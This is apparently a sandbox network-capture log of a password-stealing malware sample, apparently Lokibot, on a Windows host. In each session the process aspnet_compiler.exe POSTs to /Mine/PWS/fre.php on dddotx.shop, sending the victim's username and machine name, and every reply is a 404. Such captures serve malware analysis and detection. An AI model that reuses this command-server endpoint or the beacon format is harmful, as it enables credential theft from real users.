Sep 25, 2024 10:19:30.582844019 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYs4U4BG403UC4v3ys3AOLSftzY1n4iv%2FQlNy6PGw%2BntW94YWCYAU20mMUrW4Q%2FWxI7QkOo6up%2FbYJLgBab1kmLDN1ZajaUYZ0OgyaJ0nORm14lYgt8GvDpAlM3OYw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996f2091b7d14-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49728	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:30.729020119 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:30.733825922 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:31.368978024 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0pMkNMWPOWXfOWXSbdMK%2Bim7PfxH%2FMbO7K7imUulIgwmWbebGZVbWaSnxVqUtybrIfNtVY60v26qa239txkdFRq5qRKG6BqeJlzPV4Q8vFJ0eYCtA6lgXKdk06ODw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8996f78a81438d-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49729	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:31.827506065 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:32.177777052 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:32.827177048 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5HfV4J9%2FZW7AStvCWxgeJhDQexftFoFgr7WevX4E0H2TuzHI%2BcVIdV6srY0Y3ov8qWjCC5zDhpqS8D9K9g3n%2BkwZTzoouihlQoq%2BamIp93XfzqljM%2FjkjIRaUoTvw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997009d277d0e-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49730	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:32.984972954 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:32.989856958 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:33.627873898 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcHfoOrWcxG6OhF7xG1Qf8mnfst%2FiqonX7d0VPTP2cswqvr3COW4ifEVL3536m2AjRKtA6RrTtZSnlC8lD6MhIJSJ1mW6ez20Q1n44Rx%2FeBW0uT1NH6lhbi3jui3MA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899705afd24314-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49731	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:33.795108080 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:33.800026894 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:34.467776060 CEST	563	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=61bG63Y869gPnaBvGmPbCaSdLmgW0qaM9o5uU4OwFIdr0ob1%2BMaFHiqO7Psgd47popQpTWoE3eWUfUniq0xdhMVMUz8vMGPwR0ynFg8Angc9z1frfvBSRq23vhaPzQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89970abc444268-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49732	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:34.624982119 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:34.631186962 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:35.317949057 CEST	571	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzQ5SXQzHhQd2S6iuTyBbwjJjKAMjkeH9W8eECs%2F6mwe5wFOWDI0HneB1eafqW4HUdDrUirf0%2BphQKOBWVx1%2FsTNW3GrXBYyRni6VRrPj2cxZf%2Fbd9TIzY%2BC23cKyA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89970fe9458c89-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49733	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:35.477791071 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:35.482686996 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:36.366451025 CEST	605	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F1fRRLU7CWWQVkkMcFcpns9kDNWI%2FY%2BRdgmnhDCwQZRJl28bwkOJeZoLWexN%2FfaNRXcEIJcrYOcYkW%2BtjUKmvhmSKZAc0x7z279iF98S18rmO%2Fgvb%2B9PNyipHjM56w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997155e80433d-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49734	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:36.532704115 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:36.537688017 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:37.190291882 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2F3cZ4iDK5%2F3q9sstfWddSSfrhUxtdZt4rbz2GeEc4PuIifb0mASpT%2FnyOlnnvoqHJwVNUocvj6TrKFUGjBa%2Bv01wX2cFb4IXHs33R10dE1RplJAC1qdxLU8g9LLpg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89971bd95b0cb8-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49735	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:37.348566055 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:37.356070042 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:38.140223980 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XzH1RfkY7n7VJ7lAc3X8tzu7f5s901xzXVegSG1vuJ6iiFHGv2lW0xkNP8WVkJ%2FKuog7hdZN%2Bc4Ac0%2Blp0pcCrkzl6ufVSHe84XikjUEim%2FiFDv39Zse0wUncAxEjw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997210ac87293-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49736	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:39.235093117 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:39.239881039 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:39.901659966 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8rin9eXTDD1MO8N1rPtaZK35rNnCznZ0SsVqC4aN35Rc3ALsBG%2FeVSLlirafk8tx92P5AqRv7%2Bg%2BOsNBV95OhQPmyhjDHXzM9iJxt6Pu6kWYYQ%2FtSoZNGrSfezomg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89972cb87d42c9-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49737	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:40.072299957 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:40.078686953 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:40.752322912 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g6qXiGuk9p9UI%2FYZHM%2BFr3JOk062CHDC830ajwTByTEa6eOz13aOsO7A5RHlLWdYVKIU26CT1FsCqCV0s7AU1j2jiCRfOyAOZU1JCuBapddroDzIJjMXYCarrnUhFg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c8997320c398c39-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49738	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:40.905690908 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:40.911451101 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:41.579946041 CEST	565	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iNletTUPVbq30oQXDIq2Ynfp%2FbgboW5P3HCQuTQMvQvW90H5vgTIFUUeyzeekVyWDFVpz%2Bcuj2qphFfebZFs0b4LW8IVLLu7O4u02FZGgCfITEpOIbxBjXUNlHoOew%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89973749d41881-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49739	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:41.730624914 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:41.735559940 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:42.413814068 CEST	597	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ehB6fZy7ImVIlmywnD%2BMymoTnfqD3mblXAiebiD0nc20QZdH5vAIb0hCbRZu7xxB15VulzcXS9mFDzA%2Bgd6RrZuMMGey%2FW58ILbgTfZkxLP9tbmwiP2LkRzkmzF8jw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c89973c58b35e6e-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49740	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:42.565653086 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:42.570719957 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:43.241015911 CEST	569	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2XGiEkts0uBof99Yiiby%2BUZb4dBwcP2fr5b6Jnw0gY3rxk%2BRItaMVaKzAyL4EiSOmefBgwhSnvRp41rTXUqJoYluyY72oAW0jCpx7%2BpVauu%2BunrdKCJoAYp3BZdFVw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899741a8050f49-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49741	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:43.392992973 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:43.399884939 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Sep 25, 2024 10:19:44.027549982 CEST	573	IN	HTTP/1.1 404 Not Found Date: Wed, 25 Sep 2024 08:19:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Status: 404 Not Found CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jbGVMwKSyjSee00Czb1SILgp3jVnCuvbcb3Ygk%2F%2FcoV2%2BsludqaFaTX8K8ePcGC6uBp%2BIO5HwWvx%2F4iMbikKh5dEL%2FeiuhvWb7qJ5YSjh0vjN08gCMBq28ac3mUjBg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c899746b822192a-EWR Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.7	49742	188.114.97.3	80	720	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Sep 25, 2024 10:19:44.185964108 CEST	240	OUT	POST /Mine/PWS/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: dddotx.shop Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 925F43C2 Content-Length: 165 Connection: close
Sep 25, 2024 10:19:44.190956116 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
